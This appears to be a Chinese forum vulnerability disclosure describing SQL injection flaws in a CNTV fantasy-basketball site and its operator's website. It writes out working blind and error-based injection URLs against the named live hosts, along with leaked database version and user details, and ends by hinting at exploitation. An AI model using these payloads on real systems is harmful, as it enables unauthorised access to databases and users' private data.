央视中国网络电视台体育频道与新传在线(北京)信息技术公司旗下梦幻NBA 2K15 在线游戏的域名地址为:fantasy.sports.cntv.cn,该产品由新传在线(北京)信息技术有限公司负责建设和运营,但新传公司旗下多款产品线存在严重的SQL注入漏洞,可能严重威胁网站正常运营及用户隐私。

 

 

根据新传公司百度百科显示,该公司用户群还是很高的,尤其与央视网络电视台CNTV合作的产品线,产生了SQL注入嘛,详情如下

漏洞1:盲注漏洞

该漏洞存在于以下页面:fantasy.sports.cntv.cn/agon/index.jsp?status=3,4,5

在该页面添加单引号后爆出原页面中的SQL语句:

expecting ''', found '<EOF>' [from com.nubb.agon.po.AgonInfo where status in (3,4,5') order by sort_num asc , start_time asc]

 

 

对比两个判断SQL注入是否存在的语句:

fantasy.sports.cntv.cn/agon/index.jsp?status=3,4,5)and(1)=(1    正常显示信息
fantasy.sports.cntv.cn/agon/index.jsp?status=3,4,5)and(1)=(2    逻辑错误不显示

判断该注入点属于where括号内的数字型注入,在jsp的脚本操作中较为常见。

两个页面对比如下:

 

 

于是可以通过如下语句确定一些数据库的基本信息:

数据库版本:MySQL 5.5
fantasy.sports.cntv.cn/agon/index.jsp?status=3,4)and+substr(version(),1,3)='5.5'and(1)=(1
数据库用户:nubb @ 192.168.10.10
fantasy.sports.cntv.cn/agon/index.jsp?status=3,4,5)+and+substr(user(),1,15)='[email protected]'+and(1)=(1

 

漏洞2:新传官网注入漏洞

新传官网也存在大量的安全问题,举一个简单的注入点。

CNTV的梦幻NBA官方网页中的“讨论大厅”栏目指向的链接即为新传信息官网i.nubb.com,在该站点的检索页面输入单引号作为搜索关键字,即提示SQL报错信息。

将检索的POST提交方式更改为GET方式可获得相同的信息:i.nubb.com/search/SearchSearch.htm?search=[单引号]

报错信息如图所示:

 

 

根据上面的报错信息提示:

unexpected char: '%' [select count(*) from cn.facekee.cms.entity.CmsFansgroup a where a.id>0  and a.name like '%'%'  and a.lala=1

使用如下方式即可闭合后面的SQL语句:i.nubb.com/search/SearchSearch.htm?search='and+'aa%'='aa

根据页面的回显信息,也是可以进行SQL注入的,如图:

 

 

判断SQL注入的语句如下:

i.nubb.com/search/SearchSearch.htm?search='and+'%'='    页面正常
i.nubb.com/search/SearchSearch.htm?search='and+'1'='    页面逻辑错误

 

3. 最后
有了注入点,怎么利用就不用说了吧。

本漏洞来自习科论坛会员提交,目前已提交CNVD处理,危害还是挺高的,好多数据呢 @[email protected]

//silic.wiki